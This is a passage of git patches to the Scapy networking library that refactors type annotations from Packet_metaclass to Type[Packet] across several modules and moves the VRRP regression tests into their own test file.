self.str2extended(x)[1] def addfield(self, pkt, s, val): - # type: (Optional[BasePacket], bytes, Optional[int]) -> bytes + # type: (Optional[Packet], bytes, Optional[int]) -> bytes return s + self.i2m(pkt, val) def getfield(self, pkt, s): diff --git a/scapy/layers/can.py b/scapy/layers/can.py index ee850021e5d..35caa696b01 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -23,7 +23,7 @@ from scapy.fields import FieldLenField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ScalingField, ConditionalField, LenField from scapy.volatile import RandFloat, RandBinFloat -from scapy.packet import Packet, bind_layers, BasePacket +from scapy.packet import Packet, bind_layers from scapy.layers.l2 import CookedLinux from scapy.error import Scapy_Exception from scapy.plist import PacketList @@ -167,7 +167,7 @@ def _is_float_number(self): return self.fmt[-1] == "f" def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Optional[Union[int, float]]) -> bytes + # type: (Packet, bytes, Optional[Union[int, float]]) -> bytes if not isinstance(pkt, SignalPacket): raise Scapy_Exception("Only use SignalFields in a SignalPacket") @@ -202,7 +202,7 @@ def addfield(self, pkt, s, val): return tmp_s[:len(s)] def getfield(self, pkt, s): - # type: (BasePacket, bytes) -> Tuple[bytes, Union[int, float]] + # type: (Packet, bytes) -> Tuple[bytes, Union[int, float]] if not isinstance(pkt, SignalPacket): raise Scapy_Exception("Only use SignalFields in a SignalPacket") @@ -256,7 +256,7 @@ def randval(self): return RandFloat(min(min_val, max_val), max(min_val, max_val)) def i2len(self, pkt, x): - # type: (BasePacket, Any) -> int + # type: (Packet, Any) -> int return int(float(self.size) / 8) @@ -397,7 +397,7 @@ def open(filename): return cast(str, filename), fdesc def next(self): - # type: () -> BasePacket + # type: () -> Packet """implement the iterator protocol on a set of packets """ try: @@ -411,7 +411,7 @@ def next(self): __next__ = next def read_packet(self, size=MTU): - # type: (int) -> Optional[BasePacket] + # type: (int) -> Optional[Packet] """return a single packet read from the file or None if filters apply raise EOFError when no more packets are available @@ -482,7 +482,7 @@ def read_all(self, count=-1): return PacketList(res, name=os.path.basename(self.filename)) def recv(self, size=MTU): - # type: (int) -> Optional[BasePacket] + # type: (int) -> Optional[Packet] """ Emulate a socket """ return self.read_packet(size=size) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 0cad6202a7d..43080e844a1 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1948,9 +1948,9 @@ class DomainNameListField(StrLenField): islist = 1 padded_unit = 8 - def __init__(self, name, default, fld=None, length_from=None, padded=False): # noqa: E501 + def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 self.padded = padded - StrLenField.__init__(self, name, default, fld, length_from) + StrLenField.__init__(self, name, default, length_from=length_from) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) diff --git a/scapy/layers/tls/record_sslv2.py b/scapy/layers/tls/record_sslv2.py index 501fbd4a1cc..5b4e06abe20 100644 --- a/scapy/layers/tls/record_sslv2.py +++ b/scapy/layers/tls/record_sslv2.py @@ -29,7 +29,8 @@ def __init__(self, name, default, length_from=None): length_from = lambda pkt: ((pkt.len & 0x7fff) - (pkt.padlen or 0) - len(pkt.mac)) - super(_SSLv2MsgListField, self).__init__(name, default, length_from) + super(_SSLv2MsgListField, self).__init__(name, default, + length_from=length_from) def m2i(self, pkt, m): cls = Raw diff --git a/scapy/packet.py b/scapy/packet.py index 50721a1281a..e6a00ab107f 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -28,7 +28,7 @@ from scapy.config import conf, _version_checker from scapy.compat import raw, orb, bytes_encode from scapy.base_classes import BasePacket, Gen, SetGen, Packet_metaclass, \ - _CanvasDumpExtended, Field_metaclass + _CanvasDumpExtended from scapy.volatile import RandField, VolatileValue from scapy.utils import import_hexcap, tex_escape, colgen, issubtype, \ pretty_list, EDecimal @@ -36,6 +36,7 @@ from scapy.extlib import PYX import scapy.modules.six as six +# Typing imports from scapy.compat import ( Any, Callable, @@ -46,11 +47,11 @@ Optional, Set, Tuple, + Type, TypeVar, Union, cast, ) - try: import pyx except ImportError: @@ -101,21 +102,21 @@ class Packet(six.with_metaclass(Packet_metaclass, # type: ignore name = None fields_desc = [] # type: List[Field[Any, Any]] deprecated_fields = {} # type: Dict[str, Tuple[str, str]] - overload_fields = {} # type: Dict[Packet_metaclass, Dict[str, Any]] - payload_guess = [] # type: List[Tuple[Dict[str, Any], Packet_metaclass]] + overload_fields = {} # type: Dict[Type[Packet], Dict[str, Any]] + payload_guess = [] # type: List[Tuple[Dict[str, Any], Type[Packet]]] show_indent = 1 show_summary = True match_subclass = False - class_dont_cache = {} # type: Dict[Packet_metaclass, bool] - class_packetfields = {} # type: Dict[Packet_metaclass, Any] - class_default_fields = {} # type: Dict[Packet_metaclass, Dict[str, Any]] - class_default_fields_ref = {} # type: Dict[Packet_metaclass, List[str]] - class_fieldtype = {} # type: Dict[Packet_metaclass, Dict[str, Field[Any, Any]]] # noqa: E501 + class_dont_cache = {} # type: Dict[Type[Packet], bool] + class_packetfields = {} # type: Dict[Type[Packet], Any] + class_default_fields = {} # type: Dict[Type[Packet], Dict[str, Any]] + class_default_fields_ref = {} # type: Dict[Type[Packet], List[str]] + class_fieldtype = {} # type: Dict[Type[Packet], Dict[str, Field[Any, Any]]] # noqa: E501 @classmethod def from_hexcap(cls): - # type: (Packet_metaclass) -> Packet - return cls(import_hexcap()) # type: ignore + # type: (Type[Packet]) -> Packet + return cls(import_hexcap()) @classmethod def upper_bonds(self): @@ -198,7 +199,7 @@ def __init__(self, ] def __reduce__(self): - # type: () -> Tuple[Packet_metaclass, Tuple[()], Packet._PickleType] + # type: () -> Tuple[Type[Packet], Tuple[()], Packet._PickleType] """Used by pickling methods""" return (self.__class__, (), ( self.build(), @@ -422,7 +423,7 @@ def getfieldval(self, attr): return self.payload.getfieldval(attr) def getfield_and_val(self, attr): - # type: (str) -> Optional[Tuple[Any, Any]] + # type: (str) -> Tuple[Any, Any] if self.deprecated_fields and attr in self.deprecated_fields: attr = self._resolve_alias(attr) if attr in self.fields: @@ -431,13 +432,13 @@ def getfield_and_val(self, attr): return self.get_field(attr), self.overloaded_fields[attr] if attr in self.default_fields: return self.get_field(attr), self.default_fields[attr] - return None + raise ValueError def __getattr__(self, attr): # type: (str) -> Any try: - fld, v = self.getfield_and_val(attr) # type: ignore - except TypeError: + fld, v = self.getfield_and_val(attr) + except ValueError: return self.payload.__getattr__(attr) if fld is not None: return fld.i2h(self, v) @@ -582,7 +583,7 @@ def __div__(self, other): cloneA.add_payload(cloneB) return cloneA elif isinstance(other, (bytes, str)): - return self / conf.raw_layer(load=other) # type: ignore + return self / conf.raw_layer(load=other) else: return other.__rdiv__(self) # type: ignore __truediv__ = __div__ @@ -590,7 +591,7 @@ def __div__(self, other): def __rdiv__(self, other): # type: (Any) -> Packet if isinstance(other, (bytes, str)): - return conf.raw_layer(load=other) / self # type: ignore + return conf.raw_layer(load=other) / self else: raise TypeError __rtruediv__ = __rdiv__ @@ -1012,7 +1013,7 @@ def dissect(self, s): self.add_payload(conf.padding_layer(pad)) def guess_payload_class(self, payload): - # type: (bytes) -> Packet_metaclass + # type: (bytes) -> Type[Packet] """ DEV: Guesses the next payload class from layer bonds. Can be overloaded to use a different mechanism. @@ -1025,13 +1026,13 @@ def guess_payload_class(self, payload): try: if all(v == self.getfieldval(k) for k, v in six.iteritems(fval)): - return cls + return cls # type: ignore except AttributeError: pass return self.default_payload_class(payload) def default_payload_class(self, payload): - # type: (bytes) -> Packet_metaclass + # type: (bytes) -> Type[Packet] """ DEV: Returns the default payload class if nothing has been found by the guess_payload_class() method. @@ -1102,7 +1103,7 @@ def loop(todo, done, self=self): yield x else: if isinstance(self.payload, NoPayload): - payloads = SetGen([None]) + payloads = SetGen([None]) # type: SetGen[Packet] else: payloads = self.payload share_time = False @@ -1145,7 +1146,7 @@ def is_valid_gen_tuple(x): return len(x) == 2 and all(isinstance(z, int) for z in x) for field in fields: - fld, val = self.getfield_and_val(field) # type: ignore + fld, val = self.getfield_and_val(field) if hasattr(val, "__iterlen__"): length *= val.__iterlen__() elif is_valid_gen_tuple(val): @@ -1230,7 +1231,7 @@ def answers(self, other): return 0 def layers(self): - # type: () -> List[Packet_metaclass] + # type: () -> List[Type[Packet]] """returns a list of layer classes (including subclasses) in this packet""" # noqa: E501 layers = [] lyr = self # type: Optional[Packet] @@ -1240,7 +1241,7 @@ def layers(self): return layers def haslayer(self, cls, _subclass=None): - # type: (Union[Packet_metaclass, str], Optional[bool]) -> int + # type: (Union[Type[Packet], str], Optional[bool]) -> int """ true if self has a layer that is an instance of cls. Superseded by "cls in self" syntax. @@ -1268,7 +1269,7 @@ def haslayer(self, cls, _subclass=None): return self.payload.haslayer(cls, _subclass=_subclass) def getlayer(self, - cls, # type: Union[int, Packet_metaclass] + cls, # type: Union[int, Type[Packet], str] nb=1, # type: int _track=None, # type: Optional[List[int]] _subclass=None, # type: Optional[bool] @@ -1284,17 +1285,23 @@ def getlayer(self, match = issubtype else: match = lambda cls1, cls2: bool(cls1 == cls2) + # Note: + # cls can be int, packet, str + # string_class_name can be packet, str (packet or packet+field) + # class_name can be packet, str (packet only) if isinstance(cls, int): nb = cls + 1 - cls = None - ccls = None # type: Union[None, str] - fld = None # type: Union[None, str] - if isinstance(cls, str) and "." in cls: - ccls, fld = cls.split(".", 1) + string_class_name = "" # type: Union[Type[Packet], str] else: - ccls, fld = cls, None - if cls is None or match(self.__class__, cls) \ - or ccls in [self.__class__.__name__, self._name]: + string_class_name = cls + class_name = "" # type: Union[Type[Packet], str] + fld = None # type: Optional[str] + if isinstance(string_class_name, str) and "." in string_class_name: + class_name, fld = string_class_name.split(".", 1) + else: + class_name, fld = string_class_name, None + if not class_name or match(self.__class__, class_name) \ + or class_name in [self.__class__.__name__, self._name]: if all(self.getfieldval(fldname) == fldvalue for fldname, fldvalue in six.iteritems(flt)): if nb == 1: @@ -1313,12 +1320,12 @@ def getlayer(self, for fvalue in fvalue_gen: if isinstance(fvalue, Packet): track = [] # type: List[int] - ret = fvalue.getlayer(cls, nb=nb, _track=track, + ret = fvalue.getlayer(class_name, nb=nb, _track=track, _subclass=_subclass, **flt) if ret is not None: return ret nb = track[0] - return self.payload.getlayer(cls, nb=nb, _track=_track, + return self.payload.getlayer(class_name, nb=nb, _track=_track, _subclass=_subclass, **flt) def firstlayer(self): @@ -1329,7 +1336,7 @@ def firstlayer(self): return q def __getitem__(self, cls): - # type: (Packet_metaclass) -> Any + # type: (Union[Type[Packet], str]) -> Any if isinstance(cls, slice): lname = cls.start if cls.stop: @@ -1340,23 +1347,25 @@ def __getitem__(self, cls): lname = cls ret = self.getlayer(cls) if ret is None: - if isinstance(lname, Packet_metaclass): - lname = lname.__name__ + if isinstance(lname, type): + name = lname.__name__ elif not isinstance(lname, bytes): - lname = repr(lname) - raise IndexError("Layer [%s] not found" % lname) + name = repr(lname) + else: + name = cast(str, lname) + raise IndexError("Layer [%s] not found" % name) return ret def __delitem__(self, cls): - # type: (Packet_metaclass) -> None + # type: (Type[Packet]) -> None del(self[cls].underlayer.payload) def __setitem__(self, cls, val): - # type: (Packet_metaclass, Packet) -> None + # type: (Type[Packet], Packet) -> None self[cls].underlayer.payload = val def __contains__(self, cls): - # type: (Packet_metaclass) -> int + # type: (Union[Type[Packet], str]) -> int """ "cls in self" returns true if self has a layer which is an instance of cls. @@ -1417,7 +1426,10 @@ def _show_or_dump(self, fvalue = self.getfieldval(f.name) if isinstance(fvalue, Packet) or (f.islist and f.holds_packets and isinstance(fvalue, list)): # noqa: E501 s += "%s \\%-10s\\\n" % (label_lvl + lvl, ncol(f.name)) - fvalue_gen = SetGen(fvalue, _iterpacket=0) + fvalue_gen = SetGen( + fvalue, + _iterpacket=0 + ) # type: SetGen[Packet] for fvalue in fvalue_gen: s += fvalue._show_or_dump(dump=dump, indent=indent, label_lvl=label_lvl + lvl + " |", first_call=False) # noqa: E501 else: @@ -1637,7 +1649,7 @@ def lastlayer(self, layer=None): return self.payload.lastlayer(self) def decode_payload_as(self, cls): - # type: (Packet_metaclass) -> None + # type: (Type[Packet]) -> None """Reassembles the payload and decode it using another packet class""" s = raw(self.payload) self.payload = cls(s, _internal=1, _underlayer=self) @@ -1675,7 +1687,7 @@ def command(self): return c def convert_to(self, other_cls, **kwargs): - # type: (Packet_metaclass, **Any) -> Packet + # type: (Type[Packet], **Any) -> Packet """Converts this Packet to another type. This is not guaranteed to be a lossless process. @@ -1695,7 +1707,7 @@ def convert_to(self, other_cls, **kwargs): return Raw(raw(self)) if "_internal" not in kwargs: - return other_cls.convert_packet(self, _internal=True, **kwargs) # type: ignore # noqa: E501 + return other_cls.convert_packet(self, _internal=True, **kwargs) raise TypeError("Cannot convert {} to {}".format( type(self).__name__, other_cls.__name__)) @@ -1740,7 +1752,7 @@ def convert_packets(cls, class NoPayload(Packet): def __new__(cls, *args, **kargs): - # type: (Packet_metaclass, *Any, **Any) -> Packet + # type: (Type[Packet], *Any, **Any) -> Packet singl = cls.__dict__.get("__singl__") if singl is None: cls.__singl__ = singl = Packet.__new__(cls) @@ -1855,11 +1867,11 @@ def answers(self, other): return isinstance(other, NoPayload) or isinstance(other, conf.padding_layer) # noqa: E501 def haslayer(self, cls, _subclass=None): - # type: (Union[Packet_metaclass, str], Optional[bool]) -> int + # type: (Union[Type[Packet], str], Optional[bool]) -> int return 0 def getlayer(self, - cls, # type: Union[int, Packet_metaclass] + cls, # type: Union[int, Type[Packet], str] nb=1, # type: int _track=None, # type: Optional[List[int]] _subclass=None, # type: Optional[bool] @@ -1890,7 +1902,7 @@ def _do_summary(self): return 0, "", [] def layers(self): - # type: () -> List[Packet_metaclass] + # type: () -> List[Type[Packet]] return [] def lastlayer(self, layer=None): @@ -1966,8 +1978,8 @@ def build_padding(self): ################# -def bind_bottom_up(lower, # type: Packet_metaclass - upper, # type: Packet_metaclass +def bind_bottom_up(lower, # type: Type[Packet] + upper, # type: Type[Packet] __fval=None, # type: Optional[Any] **fval # type: Any ): @@ -1988,8 +2000,8 @@ def bind_bottom_up(lower, # type: Packet_metaclass lower.payload_guess.append((fval, upper)) -def bind_top_down(lower, # type: Packet_metaclass - upper, # type: Packet_metaclass +def bind_top_down(lower, # type: Type[Packet] + upper, # type: Type[Packet] __fval=None, # type: Optional[Any] **fval # type: Any ): @@ -2010,8 +2022,8 @@ def bind_top_down(lower, # type: Packet_metaclass @conf.commands.register -def bind_layers(lower, # type: Packet_metaclass - upper, # type: Packet_metaclass +def bind_layers(lower, # type: Type[Packet] + upper, # type: Type[Packet] __fval=None, # type: Optional[Dict[str, int]] **fval # type: Any ): @@ -2034,8 +2046,8 @@ def bind_layers(lower, # type: Packet_metaclass bind_bottom_up(lower, upper, **fval) -def split_bottom_up(lower, # type: Packet_metaclass - upper, # type: Packet_metaclass +def split_bottom_up(lower, # type: Type[Packet] + upper, # type: Type[Packet] __fval=None, # type: Optional[Any] **fval # type: Any ): @@ -2047,7 +2059,7 @@ def split_bottom_up(lower, # type: Packet_metaclass fval.update(__fval) def do_filter(params, cls): - # type: (Dict[str, int], Packet_metaclass) -> bool + # type: (Dict[str, int], Type[Packet]) -> bool params_is_invalid = any( k not in params or params[k] != v for k, v in six.iteritems(fval) ) @@ -2055,8 +2067,8 @@ def do_filter(params, cls): lower.payload_guess = [x for x in lower.payload_guess if do_filter(*x)] -def split_top_down(lower, # type: Packet_metaclass - upper, # type: Packet_metaclass +def split_top_down(lower, # type: Type[Packet] + upper, # type: Type[Packet] __fval=None, # type: Optional[Any] **fval # type: Any ): @@ -2075,8 +2087,8 @@ def split_top_down(lower, # type: Packet_metaclass @conf.commands.register -def split_layers(lower, # type: Packet_metaclass - upper, # type: Packet_metaclass +def split_layers(lower, # type: Type[Packet] + upper, # type: Type[Packet] __fval=None, # type: Optional[Any] **fval # type: Any ): @@ -2292,10 +2304,10 @@ def explore(layer=None): print(pretty_list(rtlst, [("Class", "Name")], borders=True)) -def _pkt_ls(obj, # type: Union[Packet, Packet_metaclass] +def _pkt_ls(obj, # type: Union[Packet, Type[Packet]] verbose=False, # type: bool ): - # type: (...) -> List[Tuple[str, Field_metaclass, str, str, List[str]]] + # type: (...) -> List[Tuple[str, Type[Field[Any, Any]], str, str, List[str]]] # noqa: E501 """Internal function used to resolve `fields_desc` to display it. :param obj: a packet object or class @@ -2312,8 +2324,8 @@ def _pkt_ls(obj, # type: Union[Packet, Packet_metaclass] long_attrs = [] # type: List[str] while isinstance(cur_fld, (Emph, ConditionalField)): if isinstance(cur_fld, ConditionalField): - attrs.append(cur_fld.__class__.__name__[:4]) - cur_fld = cur_fld.fld + attrs.append(cur_fld.__class__.__name__[:4]) # type: ignore + cur_fld = cur_fld.fld # type: ignore if verbose and isinstance(cur_fld, EnumField) \ and hasattr(cur_fld, "i2s"): if len(cur_fld.i2s or []) < 50: @@ -2323,12 +2335,15 @@ def _pkt_ls(obj, # type: Union[Packet, Packet_metaclass] sorted(six.iteritems(cur_fld.i2s)) ) elif isinstance(cur_fld, MultiEnumField): - fld_depend = cur_fld.depends_on(obj.__class__ - if is_pkt else obj) + fld_depend = cur_fld.depends_on( + cast(Packet, obj if is_pkt else obj()) + ) attrs.append("Depends on %s" % fld_depend) if verbose: cur_i2s = cur_fld.i2s_multi.get( - cur_fld.depends_on(obj if is_pkt else obj()), {} + cur_fld.depends_on( + cast(Packet, obj if is_pkt else obj()) + ), {} ) if len(cur_i2s) < 50: long_attrs.extend( @@ -2359,7 +2374,7 @@ def _pkt_ls(obj, # type: Union[Packet, Packet_metaclass] @conf.commands.register -def ls(obj=None, # type: Union[str, Packet, Packet_metaclass] +def ls(obj=None, # type: Optional[Union[str, Packet, Type[Packet]]] case_sensitive=False, # type: bool verbose=False # type: bool ): @@ -2378,7 +2393,10 @@ def ls(obj=None, # type: Union[str, Packet, Packet_metaclass] tip = True all_layers = sorted(conf.layers, key=lambda x: x.__name__) else: - pattern = re.compile(obj, 0 if case_sensitive else re.I) + pattern = re.compile( + cast(str, obj), + 0 if case_sensitive else re.I + ) # We first order by accuracy, then length if case_sensitive: sorter = lambda x: (x.__name__.index(obj), len(x.__name__)) @@ -2399,12 +2417,15 @@ def ls(obj=None, # type: Union[str, Packet, Packet_metaclass] "layers using a clear GUI") else: try: - fields = _pkt_ls(obj, verbose=verbose) + fields = _pkt_ls( + obj, # type: ignore + verbose=verbose + ) is_pkt = isinstance(obj, Packet) # Print for fname, cls, clsne, dflt, long_attrs in fields: - cls = cls.__name__ + " " + clsne - print("%-10s : %-35s =" % (fname, cls), end=' ') + clsinfo = cls.__name__ + " " + clsne + print("%-10s : %-35s =" % (fname, clsinfo), end=' ') if is_pkt: print("%-15r" % (getattr(obj, fname),), end=' ') print("(%r)" % (dflt,)) @@ -2423,7 +2444,7 @@ def ls(obj=None, # type: Union[str, Packet, Packet_metaclass] @conf.commands.register def rfc(cls, ret=False, legend=True): - # type: (Packet_metaclass, bool, bool) -> Optional[str] + # type: (Type[Packet], bool, bool) -> Optional[str] """ Generate an RFC-like representation of a packet def. diff --git a/scapy/plist.py b/scapy/plist.py index 677aa7f4efd..fdde6ffef2d 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -16,7 +16,7 @@ from scapy.compat import lambda_tuple_converter from scapy.config import conf from scapy.base_classes import BasePacket, BasePacketList, \ - _CanvasDumpExtended, Packet_metaclass, PacketList_metaclass + _CanvasDumpExtended, PacketList_metaclass from scapy.utils import do_graph, hexdump, make_table, make_lined_table, \ make_tex_table, issubtype from scapy.extlib import plt, Line2D, \ @@ -36,6 +36,7 @@ List, Optional, Tuple, + Type, TypeVar, Union, ) @@ -56,7 +57,7 @@ class _PacketList(Generic[_Inner]): def __init__(self, res=None, # type: Optional[Union[_PacketList[_Inner], List[_Inner]]] # noqa: E501 name="PacketList", # type: str - stats=None # type: Optional[List[Packet_metaclass]] + stats=None # type: Optional[List[Type[Packet]]] ): # type: (...) -> None """create a packet list from a list of packets @@ -674,7 +675,7 @@ def getlayer(self, cls, # type: Packet nb=None, # type: Optional[int] flt=None, # type: Optional[Dict[str, Any]] name=None, # type: Optional[str] - stats=None # type: Optional[List[Packet]] + stats=None # type: Optional[List[Type[Packet]]] ): # type: (...) -> PacketList """Returns the packet list from a given layer. @@ -718,8 +719,12 @@ def getlayer(self, cls, # type: Packet name, stats ) - def convert_to(self, other_cls, name=None, stats=None): - # type: (Packet, Optional[str], Optional[List[Packet]]) -> PacketList + def convert_to(self, + other_cls, # type: Type[Packet] + name=None, # type: Optional[str] + stats=None # type: Optional[List[Type[Packet]]] + ): + # type: (...) -> PacketList """Converts all packets to another type. See ``Packet.convert_to`` for more info. @@ -749,7 +754,7 @@ def convert_to(self, other_cls, name=None, stats=None): class PacketList(_PacketList[Packet], - BasePacketList, + BasePacketList[Packet], _CanvasDumpExtended): def sr(self, multi=False, lookahead=None): # type: (bool, Optional[int]) -> Tuple[SndRcvList, PacketList] @@ -790,14 +795,14 @@ def sr(self, multi=False, lookahead=None): class SndRcvList(_PacketList[Tuple[Packet, Packet]], - BasePacketList, + BasePacketList[Tuple[Packet, Packet]], _CanvasDumpExtended): __slots__ = [] # type: List[str] def __init__(self, - res=None, # type: Optional[Union[PacketList, List[Tuple[Packet, Packet]]]] # noqa: E501 + res=None, # type: Optional[Union[_PacketList[Tuple[Packet, Packet]], List[Tuple[Packet, Packet]]]] # noqa: E501 name="Results", # type: str - stats=None # type: Optional[List[Packet]] + stats=None # type: Optional[List[Type[Packet]]] ): # type: (...) -> None super(SndRcvList, self).__init__(res, name, stats) diff --git a/scapy/themes.py b/scapy/themes.py index 583eccb329f..a26234fffc5 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -13,6 +13,13 @@ import sys +from scapy.compat import ( + Any, + Callable, + Optional, + Union, +) + class ColorTable: colors = { # Format: (ansi, pygments) @@ -52,6 +59,7 @@ def __getattr__(self, attr): return self.colors.get(attr, [""])[0] def ansi_to_pygments(self, x): # Transform ansi encoded text to Pygments text # noqa: E501 + # type: (str) -> str for k, v in self.inv_map.items(): x = x.replace(k, " " + v) return x.strip() @@ -61,7 +69,9 @@ def ansi_to_pygments(self, x): # Transform ansi encoded text to Pygments text def create_styler(fmt=None, before="", after="", fmt2="%s"): + # type: (Optional[Any], str, str, str) -> Callable def do_style(val, fmt=fmt, before=before, after=after, fmt2=fmt2): + # type: (Union[int, str], Optional[Any], str, str, str) -> str if fmt is None: if not isinstance(val, str): val = str(val) @@ -73,12 +83,14 @@ def do_style(val, fmt=fmt, before=before, after=after, fmt2=fmt2): class ColorTheme: def __repr__(self): + # type: () -> str return "<%s>" % self.__class__.__name__ def __reduce__(self): return (self.__class__, (), ()) def __getattr__(self, attr): + # type: (str) -> Callable if attr in ["__getstate__", "__setstate__", "__getinitargs__", "__reduce_ex__"]: raise AttributeError() @@ -96,6 +108,7 @@ class NoTheme(ColorTheme): class AnsiColorTheme(ColorTheme): def __getattr__(self, attr): + # type: (str) -> Callable if attr.startswith("__"): raise AttributeError(attr) s = "style_%s" % attr @@ -238,6 +251,7 @@ class ColorOnBlackTheme(AnsiColorTheme): class FormatTheme(ColorTheme): def __getattr__(self, attr): + # type: (str) -> Callable if attr.startswith("__"): raise AttributeError(attr) colfmt = self.__class__.__dict__.get("style_%s" % attr, "%s") @@ -323,6 +337,7 @@ class HTMLTheme2(HTMLTheme): def apply_ipython_style(shell): + # type: (Any) -> None """Updates the specified IPython console shell with the conf.color_theme scapy theme.""" try: diff --git a/scapy/utils.py b/scapy/utils.py index d0b847e5ce7..9a143dca4d3 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -40,7 +40,6 @@ from scapy.pton_ntop import inet_pton # Typing imports -from scapy.base_classes import Packet_metaclass from scapy.compat import ( cast, Any, @@ -1310,7 +1309,9 @@ def __init__(self, filename, fdesc, magic): # type: (str, IO[bytes], bytes) -> None RawPcapReader.__init__(self, filename, fdesc, magic) try: - self.LLcls = conf.l2types[self.linktype] # type: Packet_metaclass + self.LLcls = conf.l2types.num2layer[ + self.linktype + ] # type: Type[Packet] except KeyError: warning("PcapReader: unknown LL type [%i]/[%#x]. Using Raw packets" % (self.linktype, self.linktype)) # noqa: E501 if conf.raw_layer is None: @@ -1337,7 +1338,7 @@ def read_packet(self, size=MTU): if conf.raw_layer is None: # conf.raw_layer is set on import import scapy.packet # noqa: F401 - p = conf.raw_layer(s) # type: ignore + p = conf.raw_layer(s) power = Decimal(10) ** Decimal(-9 if self.nano else -6) p.time = EDecimal(pkt_info.sec + power * pkt_info.usec) p.wirelen = pkt_info.wirelen @@ -1521,7 +1522,7 @@ def read_packet(self, size=MTU): raise EOFError s, (linktype, tsresol, tshigh, tslow, wirelen) = rp try: - cls = conf.l2types[linktype] # type: Packet_metaclass + cls = conf.l2types.num2layer[linktype] # type: Type[Packet] p = cls(s) # type: Packet except KeyboardInterrupt: raise @@ -1531,7 +1532,7 @@ def read_packet(self, size=MTU): if conf.raw_layer is None: # conf.raw_layer is set on import import scapy.packet # noqa: F401 - p = conf.raw_layer(s) # type: ignore + p = conf.raw_layer(s) if tshigh is not None: p.time = EDecimal((tshigh << 32) + tslow) / tsresol p.wirelen = wirelen @@ -1756,7 +1757,12 @@ def write_header(self, pkt): # type: (Optional[Union[Packet, bytes]]) -> None if self.linktype is None: try: - self.linktype = conf.l2types[pkt.__class__] + if pkt is None or isinstance(pkt, bytes): + # Can't guess LL + raise KeyError + self.linktype = conf.l2types.layer2num[ + pkt.__class__ + ] # Import here to prevent import loops from scapy.layers.inet import IP from scapy.layers.inet6 import IPv6 From e79833e46ec33be0880447a1983e3840676302fe Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 29 Oct 2020 19:33:17 +0100 Subject: [PATCH 0361/1632] Standalone VRRP tests Co-authored-by: Guillaume Valadon Co-authored-by: Gabriel Potter Co-authored-by: Matthew Smith --- test/regression.uts | 35 --------------------------------- test/scapy/layers/vrrp.uts | 40 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 40 insertions(+), 35 deletions(-) create mode 100644 test/scapy/layers/vrrp.uts diff --git a/test/regression.uts b/test/regression.uts index 8105513db2e..1bb8ae01b51 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -8575,41 +8575,6 @@ assert pkt.QUESTION_NAME == b'TEST1 ' ############ ############ -+ VRRP tests - -= VRRP - build -s = raw(IP()/VRRP()) -s == b'E\x00\x00$\x00\x01\x00\x00@p|g\x7f\x00\x00\x01\x7f\x00\x00\x01!\x01d\x00\x00\x01z\xfd\x00\x00\x00\x00\x00\x00\x00\x00' - -= VRRP - dissection -p = IP(s) -VRRP in p and p[VRRP].chksum == 0x7afd - -= VRRP IPv6 - build -s6 = raw(IPv6()/VRRPv3()) -s6 == b'`\x00\x00\x00\x00\x08p@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x011\x01d\x01\x00dj\x1f' - -= VRRP IPv6 - dissection -p6 = IPv6(s6) -VRRPv3 in p6 and p6[VRRPv3].chksum == 0x6a1f - -= VRRP - chksums -# VRRPv3 -p = Ether(src="00:00:5e:00:02:02",dst="01:00:5e:00:00:12")/IP(src="20.0.0.3", dst="224.0.0.18",ttl=255)/VRRPv3(priority=254,vrid=2,version=3,adv=1,addrlist=["20.0.1.2","20.0.1.3"]) -a = Ether(raw(p)) -assert a[VRRPv3].chksum == 0xb25e -# VRRPv1 -p = Ether(src="00:00:5e:00:02:02",dst="01:00:5e:00:00:12")/IP(src="20.0.0.3", dst="224.0.0.18",ttl=255)/VRRP(priority=254,vrid=2,version=1,adv=1,addrlist=["20.0.1.2","20.0.1.3"]) -b = Ether(raw(p)) -assert b[VRRP].chksum == 0xc6f4 - -= VRRP IPv6 - chksums -# VRRPv3 IPv6 -p = Ether(src="00:00:5e:00:02:02",dst="33:33:00:00:00:12")/IPv6(src="2001:db8::1", dst="ff02::12",hlim=255)/VRRPv3(priority=254,vrid=2,version=3,adv=1,ipcount=2,addrlist=["2001:db8::2","2001:db8::3"]) -c = Ether(raw(p)) -assert c[VRRPv3].chksum == 0x481b - - + MGCP tests = MGCP - build diff --git a/test/scapy/layers/vrrp.uts b/test/scapy/layers/vrrp.uts new file mode 100644 index 00000000000..fdd1d508c5a --- /dev/null +++ b/test/scapy/layers/vrrp.uts @@ -0,0 +1,40 @@ +% VRRP regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ VRRP tests + += VRRP - build +s = raw(IP()/VRRP()) +s == b'E\x00\x00$\x00\x01\x00\x00@p|g\x7f\x00\x00\x01\x7f\x00\x00\x01!\x01d\x00\x00\x01z\xfd\x00\x00\x00\x00\x00\x00\x00\x00' + += VRRP - dissection +p = IP(s) +VRRP in p and p[VRRP].chksum == 0x7afd + += VRRP IPv6 - build +s6 = raw(IPv6()/VRRPv3()) +s6 == b'`\x00\x00\x00\x00\x08p@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x011\x01d\x01\x00dj\x1f' + += VRRP IPv6 - dissection +p6 = IPv6(s6) +VRRPv3 in p6 and p6[VRRPv3].chksum == 0x6a1f + += VRRP - chksums +# VRRPv3 +p = Ether(src="00:00:5e:00:02:02",dst="01:00:5e:00:00:12")/IP(src="20.0.0.3", dst="224.0.0.18",ttl=255)/VRRPv3(priority=254,vrid=2,version=3,adv=1,addrlist=["20.0.1.2","20.0.1.3"]) +a = Ether(raw(p)) +assert a[VRRPv3].chksum == 